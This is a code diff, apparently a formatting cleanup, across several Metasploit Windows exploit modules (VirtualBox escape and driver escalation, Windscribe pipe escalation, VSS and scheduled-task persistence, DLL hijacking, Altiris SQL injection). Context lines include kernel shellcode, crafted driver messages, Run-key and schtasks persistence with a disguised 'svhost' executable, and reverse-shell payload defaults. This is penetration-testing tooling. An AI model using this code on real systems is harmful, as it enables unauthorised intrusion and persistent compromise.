-          xml.insert(insert + 16, "\n      #{end_boundary}")
-        end
+      # Insert expire tag if not 0
+      unless datastore['EXPIRE_TIME'] == 0
+        # Generate expire tag
+        end_boundary = create_expire_tag
+        # Inject expire tag
+        insert = xml.index("</StartBoundary>")
+        xml.insert(insert + 16, "\n      #{end_boundary}")
+      end
     end
     return xml
   end
@@ -231,7 +234,7 @@ class MetasploitModule < Msf::Exploit::Local
     begin
       vt = client.railgun.kernel32.GetLocalTime(32)
       ut = vt['lpSystemTime'].unpack("v*")
-      t = ::Time.utc(ut[0],ut[1],ut[3],ut[4],ut[5])
+      t = ::Time.utc(ut[0], ut[1], ut[3], ut[4], ut[5])
     rescue
       print_error("Could not read system time from victim... Using your local time to determine expire date")
       t = ::Time.now
@@ -335,18 +338,17 @@ class MetasploitModule < Msf::Exploit::Local
 
       # Save info to notes DB
       report_note(:host => session.session_host,
-      :type => "host.s4u_persistance.cleanup",
-      :data => {
-        :session_num => session.sid,
-        :stype => session.type,
-        :desc => session.info,
-        :platform => session.platform,
-        :via_payload => session.via_payload,
-        :via_exploit => session.via_exploit,
-        :created_at => Time.now.utc,
-        :delete_commands =>  del_task
-        }
-      )
+                  :type => "host.s4u_persistance.cleanup",
+                  :data => {
+                    :session_num => session.sid,
+                    :stype => session.type,
+                    :desc => session.info,
+                    :platform => session.platform,
+                    :via_payload => session.via_payload,
+                    :via_exploit => session.via_exploit,
+                    :created_at => Time.now.utc,
+                    :delete_commands => del_task
+                  })
     elsif create_task_response =~ /ERROR: Cannot create a file when that file already exists/
       # Clean up
       delete_file(rexe_path)

--- a/modules/exploits/windows/local/srclient_dll_hijacking.rb
+++ b/modules/exploits/windows/local/srclient_dll_hijacking.rb
@@ -29,33 +29,29 @@ class MetasploitModule < Msf::Exploit::Local
         ],
         'Platform' => 'win',
         'SessionTypes' => [ 'meterpreter' ],
-        'DefaultOptions' =>
-       {
-         'Wfsdelay' => 60,
-         'EXITFUNC' => 'thread'
-       },
-        'Targets' =>
+        'DefaultOptions' => {
+          'Wfsdelay' => 60,
+          'EXITFUNC' => 'thread'
+        },
+        'Targets' => [
           [
-            [
-              'Windows Server 2012 (x64)', {
-                'Arch' => [ARCH_X64],
-                'DefaultOptions' => {
-                  'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
-                }
+            'Windows Server 2012 (x64)', {
+              'Arch' => [ARCH_X64],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'
               }
-            ]
-          ],
-        'References' =>
-          [
-            [ 'URL', 'https://blog.vonahi.io/srclient-dll-hijacking' ],
-          ],
+            }
+          ]
+        ],
+        'References' => [
+          [ 'URL', 'https://blog.vonahi.io/srclient-dll-hijacking' ],
+        ],
         'DisclosureDate' => '2021-02-19',
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SAFE, ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SAFE, ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS, SCREEN_EFFECTS ]
+        }
       )
       )
 

--- a/modules/exploits/windows/local/tokenmagic.rb
+++ b/modules/exploits/windows/local/tokenmagic.rb
@@ -27,39 +27,34 @@ class MetasploitModule < Msf::Exploit::Local
           are affected.
         },
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'James Forshaw', # Research
-            'Ruben Boonen (@FuzzySec)', # PoC
-            'bwatters-r7', # msf module
-            'jheysel-r7' # msf module
-          ],
+        'Author' => [
+          'James Forshaw', # Research
+          'Ruben Boonen (@FuzzySec)', # PoC
+          'bwatters-r7', # msf module
+          'jheysel-r7' # msf module
+        ],
         'Platform' => ['win'],
         'SessionTypes' => ['meterpreter'],
-        'Targets' =>
-          [
-            [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
-          ],
+        'Targets' => [
+          [ 'Automatic', { 'Arch' => [ ARCH_X86, ARCH_X64 ] } ]
+        ],
         'DefaultTarget' => 0,
         'DisclosureDate' => '2017-05-25',
-        'References' =>
-          [
-            ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
-            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
-            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
-            ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
-          ],
-        'Notes' =>
-          {
-            'Stability' => [CRASH_SAFE],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
-            'Reliability' => [REPEATABLE_SESSION]
-          },
-        'DefaultOptions' =>
-          {
-            'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
-            'WfsDelay' => 900
-          }
+        'References' => [
+          ['URL', 'https://github.com/FuzzySecurity/PowerShell-Suite/blob/master/UAC-TokenMagic.ps1'],
+          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html'],
+          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html'],
+          ['URL', 'https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html']
+        ],
+        'Notes' => {
+          'Stability' => [CRASH_SAFE],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, SCREEN_EFFECTS ],
+          'Reliability' => [REPEATABLE_SESSION]
+        },
+        'DefaultOptions' => {
+          'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp',
+          'WfsDelay' => 900
+        }
       )
     )
 

--- a/modules/exploits/windows/local/unquoted_service_path.rb
+++ b/modules/exploits/windows/local/unquoted_service_path.rb
@@ -39,29 +39,26 @@ class MetasploitModule < Msf::Exploit::Local
           The service exploited won't start until the payload written to disk is removed.
           Manual cleanup is required.
         },
-        'References' =>
-          [
-            ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
-            ['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us'], # pg 676
-            ['URL', 'https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae']
-          ],
+        'References' => [
+          ['URL', 'http://msdn.microsoft.com/en-us/library/windows/desktop/ms682425(v=vs.85).aspx'],
+          ['URL', 'http://www.microsoft.com/learning/en/us/book.aspx?id=5957&locale=en-us'], # pg 676
+          ['URL', 'https://medium.com/@SumitVerma101/windows-privilege-escalation-part-1-unquoted-service-path-c7a011a8d8ae']
+        ],
         'DisclosureDate' => '2001-10-25',
         'License' => MSF_LICENSE,
-        'Author' =>
-          [
-            'sinn3r', # msf module
-            'h00die'  # improvements
-          ],
+        'Author' => [
+          'sinn3r', # msf module
+          'h00die' # improvements
+        ],
         'Platform' => [ 'win'],
         'Targets' => [ ['Windows', {}] ],
         'SessionTypes' => [ 'meterpreter' ],
         'DefaultTarget' => 0,
-        'Notes' =>
-          {
-            'Stability' => [ CRASH_SERVICE_DOWN ],
-            'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
-            'Reliability' => [ REPEATABLE_SESSION, ]
-          }
+        'Notes' => {
+          'Stability' => [ CRASH_SERVICE_DOWN ],
+          'SideEffects' => [ ARTIFACTS_ON_DISK, CONFIG_CHANGES ],
+          'Reliability' => [ REPEATABLE_SESSION, ]
+        }
       )
     )
     register_options([

--- a/modules/exploits/windows/local/virtual_box_guest_additions.rb
+++ b/modules/exploits/windows/local/virtual_box_guest_additions.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
@@ -13,54 +12,54 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Priv
   include Msf::Post::Windows::Process
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'          => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
-      'Description'    => %q{
-        A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
-        control into an arbitrary location they define. This can be used by an attacker to
-        overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
-        NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
-        Additions up to 4.3.10r93012.
-      },
-      'License'       => MSF_LICENSE,
-      'Author'        =>
-        [
-          'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
-          'Jay Smith <jsmith[at]korelogic.com>' # MSF module
-        ],
-      'Arch'          => ARCH_X86,
-      'Platform'      => 'win',
-      'SessionTypes'  => [ 'meterpreter' ],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread',
-        },
-      'Targets'       =>
-        [
-          ['Windows XP SP3',
-            {
-              'HaliQuerySystemInfo' => 0x16bba,
-              '_KPROCESS'  => "\x44",
-              '_TOKEN'     => "\xc8",
-              '_UPID'      => "\x84",
-              '_APLINKS'   => "\x88"
-            }
-          ]
-        ],
-      'References'    =>
-        [
-          ['CVE', '2014-2477'],
-          ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
-        ],
-      'DisclosureDate'=> '2014-07-15',
-      'DefaultTarget' => 0
-    }))
-
+          'Name' => 'VirtualBox Guest Additions VBoxGuest.sys Privilege Escalation',
+          'Description' => %q{
+            A vulnerability within the VBoxGuest driver allows an attacker to inject memory they
+            control into an arbitrary location they define. This can be used by an attacker to
+            overwrite HalDispatchTable+0x4 and execute arbitrary code by subsequently calling
+            NtQueryIntervalProfile on Windows XP SP3 systems. This has been tested with VBoxGuest
+            Additions up to 4.3.10r93012.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Matt Bergin <level[at]korelogic.com>', # Vulnerability discovery and PoC
+            'Jay Smith <jsmith[at]korelogic.com>' # MSF module
+          ],
+          'Arch' => ARCH_X86,
+          'Platform' => 'win',
+          'SessionTypes' => [ 'meterpreter' ],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread',
+          },
+          'Targets' => [
+            [
+              'Windows XP SP3',
+              {
+                'HaliQuerySystemInfo' => 0x16bba,
+                '_KPROCESS' => "\x44",
+                '_TOKEN' => "\xc8",
+                '_UPID' => "\x84",
+                '_APLINKS' => "\x88"
+              }
+            ]
+          ],
+          'References' => [
+            ['CVE', '2014-2477'],
+            ['URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-001.txt']
+          ],
+          'DisclosureDate' => '2014-07-15',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def fill_memory(proc, address, length, content)
-
     session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ address ].pack('V'), nil, [ length ].pack('V'), "MEM_RESERVE|MEM_COMMIT|MEM_TOP_DOWN", "PAGE_EXECUTE_READWRITE")
 
     if not proc.memory.writable?(address)
@@ -91,6 +90,7 @@ class MetasploitModule < Msf::Exploit::Local
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
+
     session.railgun.kernel32.CloseHandle(handle)
 
     os = sysinfo["OS"]
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Exploit::Local
     print_status("Storing the shellcode in memory...")
     this_proc = session.sys.process.open
 
-    restore_ptrs =  "\x31\xc0"                                         # xor eax, eax
+    restore_ptrs = "\x31\xc0" # xor eax, eax
     restore_ptrs << "\xb8" + [hali_query_system_information].pack('V') # mov eax, offset hal!HaliQuerySystemInformation
     restore_ptrs << "\xa3" + [hal_dispatch_table + 4].pack('V')        # mov dword ptr [nt!HalDispatchTable+0x4], eax
 
@@ -199,7 +199,5 @@ class MetasploitModule < Msf::Exploit::Local
     else
       fail_with(Failure::Unknown, "Error while executing the payload")
     end
-
   end
 end
-

--- a/modules/exploits/windows/local/virtual_box_opengl_escape.rb
+++ b/modules/exploits/windows/local/virtual_box_opengl_escape.rb
@@ -6,79 +6,79 @@
 class MetasploitModule < Msf::Exploit::Local
   Rank = AverageRanking
 
-  DEVICE               = '\\\\.\\VBoxGuest'
+  DEVICE = '\\\\.\\VBoxGuest'
   INVALID_HANDLE_VALUE = 0xFFFFFFFF
 
   # VBOX HGCM protocol constants
-  VBOXGUEST_IOCTL_HGCM_CONNECT    = 2269248
+  VBOXGUEST_IOCTL_HGCM_CONNECT = 2269248
   VBOXGUEST_IOCTL_HGCM_DISCONNECT = 2269252
-  VBOXGUEST_IOCTL_HGCM_CALL       = 2269256
-  CONNECT_MSG_SIZE                = 140
-  DISCONNECT_MSG_SIZE             = 8
-  SET_VERSION_MSG_SIZE            = 40
-  SET_PID_MSG_SIZE                = 28
-  CALL_EA_MSG_SIZE                = 40
-  VERR_WRONG_ORDER                = 0xffffffea
-  SHCRGL_GUEST_FN_SET_PID         = 12
-  SHCRGL_CPARMS_SET_PID           = 1
-  SHCRGL_GUEST_FN_SET_VERSION     = 6
-  SHCRGL_CPARMS_SET_VERSION       = 2
-  SHCRGL_GUEST_FN_INJECT          = 9
-  SHCRGL_CPARMS_INJECT            = 2
-  CR_PROTOCOL_VERSION_MAJOR       = 9
-  CR_PROTOCOL_VERSION_MINOR       = 1
-  VMM_DEV_HGCM_PARM_TYPE_32_BIT   = 1
-  VMM_DEV_HGCM_PARM_TYPE_64_BIT   = 2
+  VBOXGUEST_IOCTL_HGCM_CALL = 2269256
+  CONNECT_MSG_SIZE = 140
+  DISCONNECT_MSG_SIZE = 8
+  SET_VERSION_MSG_SIZE = 40
+  SET_PID_MSG_SIZE = 28
+  CALL_EA_MSG_SIZE = 40
+  VERR_WRONG_ORDER = 0xffffffea
+  SHCRGL_GUEST_FN_SET_PID = 12
+  SHCRGL_CPARMS_SET_PID = 1
+  SHCRGL_GUEST_FN_SET_VERSION = 6
+  SHCRGL_CPARMS_SET_VERSION = 2
+  SHCRGL_GUEST_FN_INJECT = 9
+  SHCRGL_CPARMS_INJECT = 2
+  CR_PROTOCOL_VERSION_MAJOR = 9
+  CR_PROTOCOL_VERSION_MINOR = 1
+  VMM_DEV_HGCM_PARM_TYPE_32_BIT = 1
+  VMM_DEV_HGCM_PARM_TYPE_64_BIT = 2
   VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR = 5
 
-  def initialize(info={})
-    super(update_info(info, {
-      'Name'           => 'VirtualBox 3D Acceleration Virtual Machine Escape',
-      'Description'    => %q{
-        This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
-        vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
-        sequence of specially crafted rendering messages, a virtual machine can exploit an out
-        of bounds array access to corrupt memory and escape to the host. This module has been
-        tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-        [
-          'Francisco Falcon', # Vulnerability Discovery and PoC
-          'Florian Ledoux', # Win 8 64 bits exploitation analysis
-          'juan vazquez' # MSF module
-        ],
-      'Arch'           => ARCH_X64,
-      'Platform'       => 'win',
-      'SessionTypes'   => ['meterpreter'],
-      'DefaultOptions' =>
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
         {
-          'EXITFUNC' => 'thread'
-        },
-      'Targets'        =>
-        [
-          [ 'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
-            {
-              :messages => :target_virtualbox_436_win7_64
-            }
-          ]
-        ],
-      'Payload'        =>
-        {
-          'Space'       => 7000,
-          'DisableNops' => true
-        },
-      'References'     =>
-        [
-          ['CVE', '2014-0983'],
-          ['BID', '66133'],
-          ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
-          ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration']
-        ],
-      'DisclosureDate' => '2014-03-11',
-      'DefaultTarget'  => 0
-    }))
-
+          'Name' => 'VirtualBox 3D Acceleration Virtual Machine Escape',
+          'Description' => %q{
+            This module exploits a vulnerability in the 3D Acceleration support for VirtualBox. The
+            vulnerability exists in the remote rendering of OpenGL-based 3D graphics. By sending a
+            sequence of specially crafted rendering messages, a virtual machine can exploit an out
+            of bounds array access to corrupt memory and escape to the host. This module has been
+            tested successfully on Windows 7 SP1 (64 bits) as Host running Virtual Box 4.3.6.
+          },
+          'License' => MSF_LICENSE,
+          'Author' => [
+            'Francisco Falcon', # Vulnerability Discovery and PoC
+            'Florian Ledoux', # Win 8 64 bits exploitation analysis
+            'juan vazquez' # MSF module
+          ],
+          'Arch' => ARCH_X64,
+          'Platform' => 'win',
+          'SessionTypes' => ['meterpreter'],
+          'DefaultOptions' => {
+            'EXITFUNC' => 'thread'
+          },
+          'Targets' => [
+            [
+              'VirtualBox 4.3.6 / Windows 7 SP1 / 64 bits (ASLR/DEP bypass)',
+              {
+                :messages => :target_virtualbox_436_win7_64
+              }
+            ]
+          ],
+          'Payload' => {
+            'Space' => 7000,
+            'DisableNops' => true
+          },
+          'References' => [
+            ['CVE', '2014-0983'],
+            ['BID', '66133'],
+            ['URL', 'http://www.coresecurity.com/advisories/oracle-virtualbox-3d-acceleration-multiple-memory-corruption-vulnerabilities'],
+            ['URL', 'http://corelabs.coresecurity.com/index.php?module=Wiki&action=view&type=publication&name=oracle_virtualbox_3d_acceleration']
+          ],
+          'DisclosureDate' => '2014-03-11',
+          'DefaultTarget' => 0
+        }
+      )
+    )
   end
 
   def open_device
@@ -150,9 +150,9 @@ class MetasploitModule < Msf::Exploit::Local
   def set_pid(pid)
     msg = "\x00" * SET_PID_MSG_SIZE
 
-    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
-    msg[4, 4]  = [@client_id].pack("V")  # u32ClientID
-    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_PID].pack("V")
+    msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4] = [@client_id].pack("V") # u32ClientID
+    msg[8, 4] = [SHCRGL_GUEST_FN_SET_PID].pack("V")
     msg[12, 4] = [SHCRGL_CPARMS_SET_PID].pack("V")
     msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_64_BIT].pack("V")
     msg[20, 4] = [pid].pack("V")
@@ -165,9 +165,9 @@ class MetasploitModule < Msf::Exploit::Local
   def set_version
     msg = "\x00" * SET_VERSION_MSG_SIZE
 
-    msg[0, 4]  = [VERR_WRONG_ORDER].pack("V")
-    msg[4, 4]  = [@client_id].pack("V") # u32ClientID
-    msg[8, 4]  = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
+    msg[0, 4] = [VERR_WRONG_ORDER].pack("V")
+    msg[4, 4] = [@client_id].pack("V") # u32ClientID
+    msg[8, 4] = [SHCRGL_GUEST_FN_SET_VERSION].pack("V")
     msg[12, 4] = [SHCRGL_CPARMS_SET_VERSION].pack("V")
     msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V")
     msg[20, 4] = [CR_PROTOCOL_VERSION_MAJOR].pack("V")
@@ -276,6 +276,7 @@ class MetasploitModule < Msf::Exploit::Local
     if handle.nil?
       return Exploit::CheckCode::Safe
     end
+
     session.railgun.kernel32.CloseHandle(handle)
 
     Exploit::CheckCode::Detected

--- a/modules/exploits/windows/local/vss_persistence.rb
+++ b/modules/exploits/windows/local/vss_persistence.rb
@@ -3,7 +3,6 @@
 # Current source: https://github.com/rapid7/metasploit-framework
 ##
 
-
 class MetasploitModule < Msf::Exploit::Local
   Rank = ExcellentRanking
 
@@ -12,28 +11,30 @@ class MetasploitModule < Msf::Exploit::Local
   include Msf::Post::Windows::Registry
   include Msf::Exploit::EXE
 
-  def initialize(info={})
-
-    super(update_info(info,
-      'Name'                 => "Persistent Payload in Windows Volume Shadow Copy",
-      'Description'          => %q{
-        This module will attempt to create a persistent payload in a new volume shadow copy. This is
-        based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has
-        been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY
-        option, the user should need password in order to start session on the target machine.
-      },
-      'Author'               => ['Jedediah Rodriguez <Jedi.rodriguez[at]gmail.com>'], # @MrXors
-      'License'              => MSF_LICENSE,
-      'Platform'             => ['win'],
-      'SessionTypes'         => ['meterpreter'],
-      'Targets'              => [ [ 'Windows 7', {} ] ],
-      'DefaultTarget'        => 0,
-      'References'           => [
-        [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],
-        [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']
-      ],
-      'DisclosureDate'=> '2011-10-21'
-    ))
+  def initialize(info = {})
+    super(
+      update_info(
+        info,
+        'Name' => "Persistent Payload in Windows Volume Shadow Copy",
+        'Description' => %q{
+          This module will attempt to create a persistent payload in a new volume shadow copy. This is
+          based on the VSSOwn Script originally posted by Tim Tomes and Mark Baggett. This module has
+          been tested successfully on Windows 7. In order to achieve persistence through the RUNKEY
+          option, the user should need password in order to start session on the target machine.
+        },
+        'Author' => ['Jedediah Rodriguez <Jedi.rodriguez[at]gmail.com>'], # @MrXors
+        'License' => MSF_LICENSE,
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [ [ 'Windows 7', {} ] ],
+        'DefaultTarget' => 0,
+        'References' => [
+          [ 'URL', 'http://pauldotcom.com/2011/11/safely-dumping-hashes-from-liv.html' ],
+          [ 'URL', 'http://www.irongeek.com/i.php?page=videos/hack3rcon2/tim-tomes-and-mark-baggett-lurking-in-the-shadows']
+        ],
+        'DisclosureDate' => '2011-10-21'
+      )
+    )
 
     register_options(
       [
@@ -43,8 +44,8 @@ class MetasploitModule < Msf::Exploit::Local
         OptBool.new('RUNKEY', [ true, 'Create AutoRun Key for the EXE', false]),
         OptInt.new('DELAY', [ true, 'Delay in Minutes for Reconnect attempt. Needs SCHTASK set to true to work. Default delay is 1 minute.', 1]),
         OptString.new('RPATH', [ false, 'Path on remote system to place Executable. Example: \\\\Windows\\\\Temp (DO NOT USE C:\\ in your RPATH!)', ]),
-      ])
-
+      ]
+    )
   end
 
   def exploit
@@ -113,14 +114,14 @@ class MetasploitModule < Msf::Exploit::Local
     end
   end
 
-  def upload(trg_loc="")
+  def upload(trg_loc = "")
     if trg_loc.nil? or trg_loc.empty?
       location = "\\Windows\\Temp"
     else
       location = trg_loc
     end
 
-    file_name  = "svhost#{rand(100)}.exe"
+    file_name = "svhost#{rand(100)}.exe"
     file_on_target = "#{location}\\#{file_name}"
 
     exe = generate_payload_exe
@@ -154,7 +155,7 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def schtasks(volume_id, exe_path)
-    sch_name = Rex::Text.rand_text_alpha(rand(8)+8)
+    sch_name = Rex::Text.rand_text_alpha(rand(8) + 8)
     global_root = "\"\\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}\""
     sch_cmd = "cmd.exe /c %SYSTEMROOT%\\system32\\schtasks.exe /create /sc minute /mo #{datastore["DELAY"]} /tn \"#{sch_name}\" /tr #{global_root}"
     cmd_exec(sch_cmd)
@@ -162,8 +163,8 @@ class MetasploitModule < Msf::Exploit::Local
   end
 
   def install_registry(volume_id, exe_path)
-    global_root =  "cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
-    nam = Rex::Text.rand_text_alpha(rand(8)+8)
+    global_root = "cmd.exe /c %SYSTEMROOT%\\system32\\wbem\\wmic.exe process call create \\\\?\\GLOBALROOT\\Device\\#{volume_id}\\#{exe_path}"
+    nam = Rex::Text.rand_text_alpha(rand(8) + 8)
     hklm_key = "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run"
     print_status("Installing into autorun as #{hklm_key}\\#{nam}")
     res = registry_setvaldata("#{hklm_key}", nam, "#{global_root}", "REG_SZ")
@@ -178,7 +179,7 @@ class MetasploitModule < Msf::Exploit::Local
   def clean_data
     host = session.sys.config.sysinfo["Computer"]
     filenameinfo = "_" + ::Time.now.strftime("%Y%m%d.%M%S")
-    logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo) )
+    logs = ::File.join(Msf::Config.log_directory, 'persistence', Rex::FileUtils.clean_path(host + filenameinfo))
     ::FileUtils.mkdir_p(logs)
     logfile = logs + ::File::Separator + Rex::FileUtils.clean_path(host + filenameinfo) + ".rc"
     return logfile

--- a/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb
+++ b/modules/exploits/windows/local/windscribe_windscribeservice_priv_esc.rb
@@ -13,46 +13,46 @@ class MetasploitModule < Msf::Exploit::Local
   include Exploit::FileDropper
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
-      'Description'    => %q{
-        The Windscribe VPN client application for Windows makes use of a
-        Windows service `WindscribeService.exe` which exposes a named pipe
-        `\\.\pipe\WindscribeService` allowing execution of programs with
-        elevated privileges.
+    super(
+      update_info(
+        info,
+        'Name' => 'Windscribe WindscribeService Named Pipe Privilege Escalation',
+        'Description' => %q{
+          The Windscribe VPN client application for Windows makes use of a
+          Windows service `WindscribeService.exe` which exposes a named pipe
+          `\.\pipe\WindscribeService` allowing execution of programs with
+          elevated privileges.
 
-        Windscribe versions prior to 1.82 do not validate user-supplied
-        program names, allowing execution of arbitrary commands as SYSTEM.
+          Windscribe versions prior to 1.82 do not validate user-supplied
+          program names, allowing execution of arbitrary commands as SYSTEM.
 
-        This module has been tested successfully on Windscribe versions
-        1.80 and 1.81 on Windows 7 SP1 (x64).
-      },
-      'License'        => MSF_LICENSE,
-      'Author'         =>
-      [
-        'Emin Ghuliev', # Discovery and exploit
-        'bcoles'        # Metasploit
-      ],
-      'References'     =>
-        [
+          This module has been tested successfully on Windscribe versions
+          1.80 and 1.81 on Windows 7 SP1 (x64).
+        },
+        'License' => MSF_LICENSE,
+        'Author' => [
+          'Emin Ghuliev', # Discovery and exploit
+          'bcoles' # Metasploit
+        ],
+        'References' => [
           ['CVE', '2018-11479'],
           ['URL', 'http://blog.emingh.com/2018/05/windscribe-vpn-privilege-escalation.html'],
           ['URL', 'https://pastebin.com/eLG3dpYK']
         ],
-      'Platform'       => ['win'],
-      'SessionTypes'   => ['meterpreter'],
-      'Targets'        => [['Automatic', {}]],
-      'DisclosureDate' => '2018-05-24',
-      'DefaultOptions' =>
-        {
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Targets' => [['Automatic', {}]],
+        'DisclosureDate' => '2018-05-24',
+        'DefaultOptions' => {
           'PAYLOAD' => 'windows/meterpreter/reverse_tcp'
         },
-      'Notes'          =>
-        {
+        'Notes' => {
           'Reliability' => [ REPEATABLE_SESSION ],
-          'Stability'   => [ CRASH_SAFE ]
+          'Stability' => [ CRASH_SAFE ]
         },
-      'DefaultTarget'  => 0))
+        'DefaultTarget' => 0
+      )
+    )
     register_advanced_options [
       OptString.new('WritableDir', [false, 'A directory where we can write files (%TEMP% by default)', nil]),
     ]

--- a/modules/exploits/windows/misc/altiris_ds_sqli.rb
+++ b/modules/exploits/windows/misc/altiris_ds_sqli.rb
@@ -4,96 +4,98 @@
 ##
 
 class MetasploitModule < Msf::Exploit::Remote
- Rank = NormalRanking
+  Rank = NormalRanking
 
- include Msf::Exploit::CmdStager
- include Msf::Exploit::Remote::Tcp
+  include Msf::Exploit::CmdStager
+  include Msf::Exploit::Remote::Tcp
 
   def initialize(info = {})
-    super(update_info(info,
-      'Name'           => 'Symantec Altiris DS SQL Injection',
-      'Description'    => %q{
-        This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
-        to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
-        numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
-        several SQL injections are required in close succession, first to enable xp_cmdshell, then
-        retrieve the payload via TFTP and finally execute it. The module also has the capability
-        to disable or enable local application authentication. In order to work the target system
-        must have a tftp client available.
-      },
-      'Author'         =>
-        [
-          'Brett Moore',  # Vulnerability discovery
-          '3v0lver'       # Metasploit module
+    super(
+      update_info(
+        info,
+        'Name' => 'Symantec Altiris DS SQL Injection',
+        'Description' => %q{
+          This module exploits a SQL injection flaw in Symantec Altiris Deployment Solution 6.8
+          to 6.9.164. The vulnerability exists on axengine.exe which fails to adequately sanitize
+          numeric input fields in "UpdateComputer" notification Requests. In order to spawn a shell,
+          several SQL injections are required in close succession, first to enable xp_cmdshell, then
+          retrieve the payload via TFTP and finally execute it. The module also has the capability
+          to disable or enable local application authentication. In order to work the target system
+          must have a tftp client available.
+        },
+        'Author' => [
+          'Brett Moore', # Vulnerability discovery
+          '3v0lver' # Metasploit module
         ],
-      'License'        => MSF_LICENSE,
-      'References'     =>
-        [
+        'License' => MSF_LICENSE,
+        'References' => [
           [ 'CVE', '2008-2286' ],
           [ 'OSVDB', '45313' ],
           [ 'BID', '29198'],
           [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-08-024' ]
         ],
-      'DefaultOptions' =>
-        {
+        'DefaultOptions' => {
           'EXITFUNC' => 'process',
         },
-      'Targets' =>
-        [
-          [ 'Windows 2003 (with tftp client available)',
+        'Targets' => [
+          [
+            'Windows 2003 (with tftp client available)',
             {
               'Arch' => ARCH_X86,
               'Platform' => 'win'
             }
           ]
         ],
-      'Privileged' => true,
-      'Platform' => 'win',
-      'DisclosureDate' => '2008-05-15',
-      'DefaultTarget' => 0))
